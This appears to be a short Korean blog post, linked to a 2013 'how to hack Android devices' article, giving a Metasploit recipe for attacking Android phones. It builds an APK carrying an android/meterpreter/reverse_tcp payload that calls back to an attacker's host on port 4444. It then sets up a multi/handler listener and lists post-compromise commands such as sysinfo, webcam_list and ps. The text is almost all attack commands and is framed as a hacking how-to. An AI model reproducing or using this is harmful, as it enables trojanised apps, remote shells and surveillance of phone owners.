본문 바로가기

40./41. Android

[Android Exploit] Android Exploit with metasploit

metasploit reverse_tcp android
http://exploiterz.blogspot.kr/2013/07/how-to-hack-android-devices-using.html

메타익스플로잇을 사용하여 안드로이드 Exploit Code가 포함된 APK 생성 및 리버스커넥션 연결하기

# ifconfig


# msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > oneandonlyme.apk


# msfconsole


msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost X.X.X.X
msf exploit(handler) > set lport 4444


msf exploit(handler) > exploit


sysinfo
webcam_list
getuid
ps